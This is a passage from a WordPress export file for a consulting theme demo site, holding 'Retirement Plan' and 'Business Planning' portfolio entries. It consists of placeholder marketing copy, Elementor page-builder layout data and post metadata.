1;s:10:"icon_color";i:1;s:20:"icon_secondary_color";i:1;s:18:"icon_primary_color";i:1;}s:20:"section_social_hover";a:1:{s:19:"hover_primary_color";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:8;s:19:"_inline_size_tablet";i:4;s:19:"_inline_size_mobile";i:2;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:13:"margin_tablet";i:2;s:13:"margin_mobile";i:2;}}s:5:"style";a:1:{s:14:"section_border";a:1:{s:12:"border_width";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:3;s:15:"control_percent";i:4;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:3;s:11:"header_size";i:3;}}s:5:"style";a:1:{s:19:"section_title_style";a:4:{s:11:"title_color";i:3;s:21:"typography_typography";i:3;s:20:"typography_font_size";i:3;s:22:"typography_font_weight";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:7:"_margin";i:3;s:14:"_margin_mobile";i:3;}}}}s:9:"icon-list";a:3:{s:5:"count";i:2;s:15:"control_percent";i:3;s:8:"controls";a:2:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:2;}}s:5:"style";a:2:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:2;}s:18:"section_text_style";a:5:{s:10:"text_color";i:2;s:16:"text_color_hover";i:2;s:11:"text_indent";i:2;s:26:"icon_typography_typography";i:2;s:25:"icon_typography_font_size";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:2:{s:6:"layout";i:2;s:3:"gap";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:2;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:2;s:16:"background_color";i:2;}s:14:"section_border";a:3:{s:13:"border_border";i:1;s:12:"border_width";i:1;s:12:"border_color";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:7:"padding";i:2;s:14:"padding_mobile";i:1;}}}}s:8:"icon-box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:9;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:3;s:16:"description_text";i:3;s:8:"position";i:3;s:10:"title_size";i:3;s:13:"selected_icon";i:3;s:4:"link";i:2;}}s:5:"style";a:2:{s:18:"section_style_icon";a:4:{s:13:"primary_color";i:3;s:9:"icon_size";i:3;s:6:"rotate";i:3;s:10:"icon_space";i:3;}s:21:"section_style_content";a:12:{s:18:"title_bottom_space";i:3;s:27:"title_typography_typography";i:3;s:26:"title_typography_font_size";i:3;s:28:"title_typography_font_weight";i:3;s:33:"description_typography_typography";i:3;s:32:"description_typography_font_size";i:3;s:34:"description_typography_font_weight";i:3;s:11:"title_color";i:3;s:28:"title_typography_font_family";i:3;s:17:"description_color";i:3;s:34:"description_typography_font_family";i:3;s:17:"text_align_mobile";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:2;}}}}s:27:"wp-widget-mc4wp_form_widget";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Retirement Plan</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/retirement-plan/</link>
		<pubDate>Fri, 11 Sep 2020 04:29:59 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=797</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>OceanThemes</p>		
			<h6>Website:</h6>		
		<p>oceanthemes.net</p>		
			<h6>Date:</h6>		
		<p>July 02, 2019</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project-home-2.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project-home-2.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-home-2-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener">
						Twitter
											</a>
					<a target="_blank" rel="noopener">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>797</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:29:59]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 04:29:59]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[retirement-plan]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="strategy"><![CDATA[strategy]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.14]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"60e1ac27","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"4c36af66","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"4e2f2262","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"1e19bf7","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"5fceea31","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"365148c8","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"56ce4a9","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"62b7915","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"7940adfb","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"2711c64d","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"10bfada8","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"366a5c36","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"229cd6e2","elType":"widget","settings":{"editor":"<p>July 02, 2019<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"460b2861","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"3bd9565","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"1171a95e","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"671086a6","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"6801bcf2","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"28bd226","elType":"section","settings":[],"elements":[{"id":"37696c6","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"afe1876","elType":"widget","settings":{"title":"<span style=\"color:#4b83fc\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"77acf7d","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"5601b51","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#4B83FC","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"d9d3ddf","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"9dd77e2","elType":"widget","settings":{"title":"<span style=\"color:#4b83fc\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"15f20ca","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"28848f4","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"59086cc","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"06d0c8e","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"5461c21","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"1473ac8","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"68a9d85","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"2caf02a","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"4dfb381","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"d896a77","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"cdd214b","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"99f4431","elType":"widget","settings":{"title":"<span style=\"color:#4b83fc\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"8d1529b","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"df37559","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"4f4e1e3","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #4b83fc;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"dd451e9","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"e8f7d8f","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project-home-2.png","id":1480},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"592848d","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[800]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Business Planning</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/business-planning/</link>
		<pubDate>Fri, 11 Sep 2020 04:38:39 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=802</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
